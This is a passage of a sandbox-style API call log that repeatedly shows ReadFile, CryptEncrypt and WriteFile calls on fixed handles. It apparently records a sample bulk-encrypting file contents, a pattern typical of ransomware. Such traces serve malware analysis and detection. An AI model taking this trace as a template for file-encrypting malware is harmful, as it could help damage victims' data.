| out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.226] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.226] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.226] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.226] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.226] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.226] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.226] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.226] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.226] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.227] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.227] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.227] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.227] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.227] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.227] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.227] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.227] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.227] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.227] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.227] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.227] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.227] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.228] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.228] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.228] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.228] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.228] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.228] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.228] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.228] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.228] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.228] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.228] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.228] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.228] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.228] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.229] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.229] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.229] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.229] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.229] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.229] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.229] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.229] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.229] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.229] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.229] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.229] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.229] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.229] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.229] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.230] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.230] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.230] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.230] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.230] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.230] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.230] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.230] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.230] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.230] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.230] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.230] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.230] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.230] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.230] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.231] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.231] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.231] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.231] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.231] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.231] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.231] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.231] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.231] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.231] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.232] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.232] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.232] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.232] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.232] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.232] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.232] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.232] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.232] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.232] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.232] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.232] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.232] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.232] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.232] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.233] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.233] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.233] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.233] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.233] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.233] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.233] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.233] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.233] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.233] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.233] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.233] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.233] CryptEncrypt (in: hKey=0x2e7fc40, 